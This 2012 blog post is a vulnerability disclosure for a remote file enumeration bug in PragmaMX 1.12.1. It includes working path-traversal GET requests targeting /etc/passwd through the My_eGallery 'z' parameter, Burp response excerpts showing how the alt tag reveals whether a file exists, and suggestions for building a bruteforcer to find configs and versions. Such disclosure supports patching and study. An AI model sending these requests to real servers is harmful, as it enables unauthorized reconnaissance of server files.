Sunday, 18 March 2012

[EN] PragmaMX 1.12.1 - remote file enumeration


# TITLE ....... # PragmaMx 1.12.1 remote file enumeration ......................................... #
# DATE ........ # 15.03.2012 ...................................................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ..................................................... #
# SOFT LINK ... # http://pragmamx.org ............................................................. #
# VERSION ..... # 1.12.1 .......................................................................... #
# TESTED ON ... # LAMP ............................................................................ #
# ................................................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#..........................................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#..........................................................#
# 2. What is the type of vulnerability?

This is "remote file enumeration" bug.
After some fuzzing tests I found nice behavior of new PragmaMX.

The "correct functionality" is z-parameter is handling image filename.
I've done something else. I pointed 'filename' to 'other file in file system',
for example /etc/passwd.


#..........................................................#
# 3. Where is bug :)

Vulnerable is "z" parameter.
If we send GET like this:

http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&width=295&height=420

our response should looke like:
...cut.from.Burp...
(...)
 <head>
    <title>/etc/passwd</title>
  </head>
  <body style="margin: 0; padding: 0;">
    <img src="../../../../../../../../../../../../etc/passwd" width="295" height="420" alt="/etc/passwd" />  </body>
</html>
...cut.from.Burp...

This will be an answer "if remote file is there". By "there" I mean localization-of-file-You-point.

If there won't be a file You choosed, answer will be something like:
(GET:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdlalala.txt&width=295&height=420
)

...cut.from.Burp...
 <head>
    <title></title>
  </head>
  <body style="margin: 0; padding: 0;">
    <img src="../../../../../../../../../../../../etc/passwdlalala.txt" width="295" height="420" alt="" />  </body>
</html>
...cut.from.Burp...

So the difference is in "alt" tag in answer.
If in remote server we can 'find a file x', then this 'x' name will be presented in HTTP response.
If in remote localization we can not find a file (x), then output (alt tag) should be blank.

This vulnerability can be used to:
a) check for some other lfi/rfi-based attacks
b) write a bruteforcer to determine OS/PHP-version, get paths of configs, etc...


And here will be more:
./modules/My_eGallery/image.php:19:$img = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';


#..........................................................#
# 4. More...

- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#..........................................................#
# 5. Mail me, I'm still looking for a new projects... ;)

#............................................#
# Best regards
#

No comments:

Post a Comment

What do You think...?